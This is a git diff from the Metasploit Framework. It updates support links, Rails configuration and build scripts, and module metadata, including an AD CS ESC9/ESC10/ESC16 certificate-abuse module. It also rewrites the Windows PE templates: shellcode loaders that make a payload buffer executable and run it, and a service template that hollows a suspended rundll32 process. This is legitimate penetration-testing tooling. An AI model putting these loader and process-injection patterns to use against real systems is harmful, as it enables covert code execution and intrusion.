 For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).

 ## Support and Communication
-For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.
+For questions and suggestions, you can:
+
+- Join our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) for community support and general questions
+- Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat
+- Submit [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) for bug reports and feature requests
+- Follow [@metasploit](https://x.com/metasploit) on X or [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit) on Mastodon for updates
+
+**Note:** Some community members may still use IRC channels and the metasploit-hackers mailing list, though the primary support channels are now GitHub Discussions and Slack.

 ## Installing Metasploit

@@ -4,6 +4,26 @@ Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
 require 'rails'
 require File.expand_path('../boot', __FILE__)

+require 'action_view'
+# Monkey patch https://github.com/rails/rails/blob/v7.2.2.1/actionview/lib/action_view/helpers/tag_helper.rb#L51
+# Might be fixed by 8.x https://github.com/rails/rails/blob/v8.0.2/actionview/lib/action_view/helpers/tag_helper.rb#L51C1-L52C1
+raise unless ActionView::VERSION::STRING == '7.2.2.1' # A developer will need to ensure this is still required when bumping rails
+module ActionView::Helpers::TagHelper
+  class TagBuilder
+    def self.define_element(name, code_generator:, method_name: name.to_s.underscore)
+      code_generator.define_cached_method(method_name, namespace: :tag_builder) do |batch|
+        # Fixing a bug introduced by Metasploit's global Kernel patch: https://github.com/rapid7/metasploit-framework/blob/ae1db09f32cd04c007dbf445cf16dc22c9fc2e53/lib/rex.rb#L74-L79
+        # which fails when using the below 'instance_methods.include?(method_name.to_sym)' check
+        batch.push(<<~RUBY) # unless instance_methods.include?(method_name.to_sym)
+              def #{method_name}(content = nil, escape: true, **options, &block)
+                tag_string("#{name}", content, options, escape: escape, &block)
+              end
+            RUBY
+      end
+    end
+  end
+end
+
 all_environments = [
    :development,
    :production,
@@ -41,7 +61,7 @@ module Metasploit
      config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
      config.autoloader = :zeitwerk

-      config.load_defaults 7.1
+      config.load_defaults 7.2

      config.eager_load = false
    end
@@ -1,8 +1,8 @@
 # PE Source Code
 This directory contains the source code for the PE executable templates.

-## Building DLLs
-Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
+## Building
+Use the provided `build_all.bat` file, and run it from within the Visual Studio
 developer console. The batch file requires that the `%VCINSTALLDIR%` environment
 variable be defined (which it should be by default). The build script will
 create both the x86 and x64 templates before moving them into the correct
@@ -0,0 +1,17 @@
+@echo off
+
+echo Compiling DLLs
+
+for /D %%d in (dll*) do (
+  pushd "%%d"
+  call build.bat
+  popd
+)
+
+echo Compiling EXEs
+
+for /D %%e in (exe*) do (
+  pushd "%%e"
+  call build.bat
+  popd
+)
@@ -1,7 +0,0 @@
-@echo off
-
-for /D %%d in (dll*) do (
-  pushd "%%d"
-  build.bat
-  popd
-)
@@ -3,6 +3,7 @@
 if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rem mscoree.lib requires .NET SDK to be installed, add it as a Visual Studio component
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 exit /B
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- template.c /Fe:template_%1_windows.exe /link kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,26 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "service", "service.vcproj", "{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Release|Win32 = Release|Win32
-		Release|x64 = Release|x64
-		Debug|Win32 = Debug|Win32
-		Debug|x64 = Debug|x64
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.ActiveCfg = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.Build.0 = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.ActiveCfg = Debug|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.Build.0 = Debug|x64
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
@@ -1,343 +0,0 @@
-<?xml version="1.0" encoding="Windows-1252"?>
-<VisualStudioProject
-	ProjectType="Visual C++"
-	Version="9.00"
-	Name="service"
-	ProjectGUID="{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-	RootNamespace="service"
-	Keyword="Win32Proj"
-	TargetFrameworkVersion="196613"
-	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-		<Platform
-			Name="x64"
-		/>
-	</Platforms>
-	<ToolFiles>
-	</ToolFiles>
-	<Configurations>
-		<Configuration
-			Name="Debug|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="4"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Debug|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../service.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../template_x64_windows_svc.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-	</Configurations>
-	<References>
-	</References>
-	<Files>
-		<Filter
-			Name="Source Files"
-			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
-			>
-			<File
-				RelativePath=".\service.c"
-				>
-			</File>
-		</Filter>
-	</Files>
-	<Globals>
-	</Globals>
-</VisualStudioProject>
@@ -1,11 +1,11 @@
-#include <stdio.h>
+#include <windows.h>

 #define SCSIZE 4096
-char payload[SCSIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

-char comment[512] = "";
-
-int main(int argc, char **argv) {
-	(*(void (*)()) payload)();
-	return(0);
+void main() {
+	DWORD dwOldProtect;
+	VirtualProtect(bPayload, SCSIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect);
+	(*(void (*)()) bPayload)();
+	return;
 }
@@ -0,0 +1,98 @@
+;
+; A minimal AArch64 PE template for Metasploit shellcode
+; Author: Alexander 'xaitax' Hagenah
+;
+; --- Compilation (Microsoft Visual Studio Build Tools) ---
+; 1. Assemble:
+;    armasm64.exe -o template_aarch64_windows.obj template_aarch64_windows.asm
+;
+; 2. Link:
+;    LINK.exe template_aarch64_windows.obj /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe
+;
+;
+; --- Cross Compilation (Microsoft Visual Studio Build Tools) ---
+; 1. Locate Cross Compiler Tools and Libraries
+;     In this case: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\
+;     And: C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm64
+; 2. Assemble:
+;    "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\armasm64.exe" -o template_aarch64_windows.obj template_aarch64_windows.asm
+; 3. Link:
+;    "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\link.exe"  template_aarch64_windows.obj /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm64" /MACHINE:ARM64 /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe
+        AREA    |.text|, CODE, READONLY
+
+; Import the Win32 functions we need from kernel32.dll
+        IMPORT  VirtualAlloc
+        IMPORT  VirtualProtect
+        IMPORT  ExitProcess
+
+; Define constants for Win32 API calls
+SCSIZE          EQU     4096
+MEM_COMMIT      EQU     0x1000
+PAGE_READWRITE  EQU     0x04
+PAGE_EXECUTE    EQU     0x10
+
+; Export the entry point of our program
+        EXPORT main
+
+main
+        ; Allocate space on the stack for the oldProtection variable (DWORD)
+        sub     sp, sp, #16
+        
+        ; --- 1. Allocate executable memory ---
+        ; hfRet = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT, PAGE_READWRITE);
+        mov     x0, #0
+        mov     x1, #SCSIZE
+        mov     x2, #MEM_COMMIT
+        mov     x3, #PAGE_READWRITE
+        ldr     x8, =VirtualAlloc
+        blr     x8
+
+        ; Check if VirtualAlloc failed. If so, exit.
+        cbz     x0, exit_fail
+
+        ; Save the pointer to our new executable buffer in a non-volatile register
+        mov     x19, x0
+
+        ; --- 2. Copy the payload into the new buffer ---
+        ; This is a simple memcpy(dest, src, size)
+        mov     x0, x19                 ; x0 = dest = our new buffer
+        ldr     x1, =payload_buffer     ; x1 = src = the payload in our .data section
+        mov     x2, #SCSIZE             ; x2 = count
+copy_loop
+        ldrb    w3, [x1], #1            ; Load byte from src, increment src pointer
+        strb    w3, [x0], #1            ; Store byte to dest, increment dest pointer
+        subs    x2, x2, #1              ; Decrement counter
+        b.ne    copy_loop               ; Loop if not zero
+
+        ; --- 3. Change memory permissions to executable ---
+        ; VirtualProtect(hfRet, SCSIZE, PAGE_EXECUTE, &dwOldProtect);
+        mov     x0, x19                 ; x0 = buffer address
+        mov     x1, #SCSIZE             ; x1 = size
+        mov     x2, #PAGE_EXECUTE       ; x2 = new protection
+        mov     x3, sp                  ; x3 = pointer to oldProtection on the stack
+        ldr     x8, =VirtualProtect
+        blr     x8
+
+        ; --- 4. Execute the payload ---
+        ; Jump to the shellcode we just copied and protected.
+        blr     x19
+
+exit_success
+        ; Shellcode returned, or we are done. Exit cleanly.
+        mov     x0, #0                  ; Exit code 0
+        ldr     x8, =ExitProcess
+        blr     x8
+        
+exit_fail
+        ; Something went wrong. Exit with code 1.
+        mov     x0, #1
+        ldr     x8, =ExitProcess
+        blr     x8
+
+; The data section where the payload will be located.
+; The 'PAYLOAD:' tag must be at the very beginning of this buffer.
+payload_buffer
+        DCB     "PAYLOAD:"
+        SPACE   SCSIZE - 8 ; Reserve the rest of the 4096 bytes
+
+        END
@@ -0,0 +1,69 @@
+// AArch64 PE EXE Template for Metasploit Framework
+//
+// -----------------------------------------------------------------------------
+//
+// Compilation Instructions:
+//
+//   Using MSVC on a Windows ARM64 Host:
+//
+//   cl.exe /nologo /O2 /W3 /GS- /D_WIN64 template_aarch64_windows.c /link ^
+//   /subsystem:windows /machine:arm64 /entry:main ^
+//   /out:template_aarch64_windows.exe kernel32.lib
+//
+// -----------------------------------------------------------------------------
+
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+#undef WIN32_LEAN_AND_MEAN
+
+#define PAYLOAD_MARKER "PAYLOAD:"
+#define SCSIZE 8192
+
+char payload[SCSIZE] = PAYLOAD_MARKER;
+
+int main(void)
+{
+    void *exec_mem;
+    DWORD old_prot;
+    HANDLE hThread;
+
+    // Stage 1: Allocate a block of memory. We request READWRITE permissions
+    // initially so we can copy our payload into it.
+    exec_mem = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (exec_mem == NULL)
+    {
+        // Fail silently if allocation fails.
+        return 1;
+    }
+
+    // Stage 2: Copy the payload from our data section into the new memory block.
+    // A simple loop is used for maximum compiler compatibility and to avoid
+    // needing extra headers like <string.h> for memcpy.
+    for (int i = 0; i < SCSIZE; i++)
+    {
+        ((char *)exec_mem)[i] = payload[i];
+    }
+
+    // Stage 3: Change the memory's protection flags from READWRITE to
+    // EXECUTE_READ.
+    if (VirtualProtect(exec_mem, SCSIZE, PAGE_EXECUTE_READ, &old_prot) == FALSE)
+    {
+        // Fail silently if we cannot make the memory executable.
+        return 1;
+    }
+
+    // Stage 4: Execute the shellcode.
+    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);
+    if (hThread)
+    {
+        WaitForSingleObject(hThread, INFINITE);
+        CloseHandle(hThread);
+    }
+    else
+    {
+        // As a fallback in case CreateThread fails, call the shellcode directly.
+        ((void (*)())exec_mem)();
+    }
+
+    return 0;
+}
@@ -1,32 +0,0 @@
-; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-; Architecture: x64
-;
-; Assemble and link with the following command:
-; "C:\Program Files\Microsoft Visual Studio 9.0\VC\bin\x86_amd64\ml64" template_x64_windows.asm /link /subsystem:windows /defaultlib:"C:\Program Files\Microsoft SDKs\Windows\v6.0A\Lib\x64\kernel32.lib" /entry:main 
-
-extrn ExitProcess : proc
-extrn VirtualAlloc : proc
-
-.code
-
-	main proc 
-		sub rsp, 40        ;
-		mov r9, 40h        ; 
-		mov r8, 3000h      ; 
-		mov rdx, 4096      ; 
-		xor rcx, rcx       ; 
-		call VirtualAlloc  ; lpPayload = VirtualAlloc( NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
-		mov rcx, 4096      ;
-		mov rsi, payload   ;
-		mov rdi, rax       ;
-		rep movsb          ; memcpy( lpPayload, payload, 4096 );
-		call rax           ; lpPayload();
-		xor rcx, rcx       ;
-		call ExitProcess   ; ExitProcess( 0 );
-	main endp
-	
-	payload proc
-		A byte 'PAYLOAD:'
-		B db 4096-8 dup ( 0 )
-	payload endp
-end
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows_svc.exe /link advapi32.lib kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,16 +1,28 @@
 #define WIN32_LEAN_AND_MEAN
 #include <windows.h>

-#define PAYLOAD_SIZE	8192
+#define SCSIZE 8192

 char cServiceName[32] = "SERVICENAME";

-char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

 SERVICE_STATUS ss;

 SERVICE_STATUS_HANDLE hStatus = NULL;

+#if BUILDMODE == 2
+/* hand-rolled bzero allows us to avoid including ms vc runtime */
+void inline_bzero(void *p, size_t l)
+{
+	BYTE *q = (BYTE *)p;
+	size_t x = 0;
+	for (x = 0; x < l; x++)
+		*(q++) = 0x00;
+}
+
+#endif
+
 /*
 *
 */
@@ -34,9 +46,9 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	PROCESS_INFORMATION pi;
 	LPVOID lpPayload = NULL;

-	ZeroMemory( &ss, sizeof(SERVICE_STATUS) );
-	ZeroMemory( &si, sizeof(STARTUPINFO) );
-	ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );
+	inline_bzero( &ss, sizeof(SERVICE_STATUS) );
+	inline_bzero( &si, sizeof(STARTUPINFO) );
+	inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );

 	si.cb = sizeof(STARTUPINFO);

@@ -47,7 +59,7 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

 	hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );
-  
+
 	if ( hStatus )
 	{
 		ss.dwCurrentState = SERVICE_RUNNING;
@@ -57,30 +69,30 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 		if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
 		{
 			Context.ContextFlags = CONTEXT_FULL;
-		  
+
 			GetThreadContext( pi.hThread, &Context );
-		  
-			lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+
+			lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
 			if( lpPayload )
 			{
-				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );
+				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );
 #ifdef _WIN64
-				Context.Rip = (DWORD64)lpPayload;
+				Context.Rip = (ULONG_PTR)lpPayload;
 #else
-				Context.Eip = (DWORD)lpPayload;
+				Context.Eip = (ULONG_PTR)lpPayload;
 #endif
 				SetThreadContext( pi.hThread, &Context );
 			}

 			ResumeThread( pi.hThread );
-			
+
 			CloseHandle( pi.hThread );
-		  
+
 			CloseHandle( pi.hProcess );
 		}
-		
+
 		ServiceHandler( SERVICE_CONTROL_STOP );
-		
+
 		ExitProcess( 0 );
 	}
 }
@@ -88,12 +100,13 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 /*
 *
 */
-int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
+void main()
 {
-	SERVICE_TABLE_ENTRY st[] = 
-    { 
-        { (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain }, 
-        { NULL, NULL } 
-    };
-	return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	SERVICE_TABLE_ENTRY st[] =
+		{
+			{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
+			{ NULL, NULL }
+		};
+	StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	return;
 }
@@ -823,6 +823,69 @@
      }
    ]
  },
+  "auxiliary_admin/dcerpc/esc_update_ldap_object": {
+    "name": "Exploits AD CS Template misconfigurations which involve updating an LDAP object: ESC9, ESC10, and ESC16",
+    "fullname": "auxiliary/admin/dcerpc/esc_update_ldap_object",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Will Schroeder",
+      "Lee Christensen",
+      "Oliver Lyak",
+      "Spencer McIntyre",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits Active Directory Certificate Services (AD CS) template misconfigurations, specifically\n          ESC9, ESC10, and ESC16, by updating an LDAP object and requesting a certificate on behalf of a target user.\n          The module leverages the auxiliary/admin/ldap/ldap_object_attribute module to update the LDAP object and the\n          admin/ldap/shadow_credentials module to add shadow credentials for the target user if the target password is\n          not provided. It then uses the admin/kerberos/get_ticket module to retrieve the NTLM hash of the target user\n          and requests a certificate via MS-ICPR. The resulting certificate can be used for various operations, such as\n          authentication.\n\n          The module ensures that any changes made by the ldap_object_attribute or shadow_credentials module are\n          reverted after execution to maintain system integrity.",
+    "references": [
+      "URL-https://github.com/GhostPack/Certify",
+      "URL-https://github.com/ly4k/Certipy",
+      "URL-https://medium.com/@offsecdeer/adcs-exploitation-series-part-2-certificate-mapping-esc15-6e19a6037760",
+      "URL-https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc16-a-compatibility-mode"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2025-09-25 13:35:41 +0000",
+    "path": "/modules/auxiliary/admin/dcerpc/esc_update_ldap_object.rb",
+    "is_install_path": true,
+    "ref_name": "admin/dcerpc/esc_update_ldap_object",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [],
+      "Stability": [],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "AKA": [
+        "ESC9",
+        "ESC10",
+        "ESC16"
+      ]
+    },
+    "session_types": [
+      "smb"
+    ],
+    "needs_cleanup": false,
+    "actions": [
+      {
+        "name": "REQUEST_CERT",
+        "description": "Request a certificate"
+      }
+    ]
+  },
  "auxiliary_admin/dcerpc/icpr_cert": {
    "name": "ICPR Certificate Management",
    "fullname": "auxiliary/admin/dcerpc/icpr_cert",
@@ -6639,7 +6702,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-01-29 14:25:33 +0000",
+    "mod_time": "2025-08-11 11:41:05 +0000",
    "path": "/modules/auxiliary/admin/kerberos/get_ticket.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/get_ticket",
@@ -6879,7 +6942,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-30 13:54:35 +0000",
+    "mod_time": "2025-07-15 17:20:36 +0000",
    "path": "/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/ad_cs_cert_template",
@@ -6970,6 +7033,64 @@
      }
    ]
  },
+  "auxiliary_admin/ldap/ldap_object_attribute": {
+    "name": "LDAP Update Object",
+    "fullname": "auxiliary/admin/ldap/ldap_object_attribute",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "jheysel"
+    ],
+    "description": "This module allows creating, reading, updating and deleting attributes of LDAP objects.\n          Users can specify the object and must specify a corresponding attribute.",
+    "references": [],
+    "platform": "",
+    "arch": "",
+    "rport": 389,
+    "autofilter_ports": [],
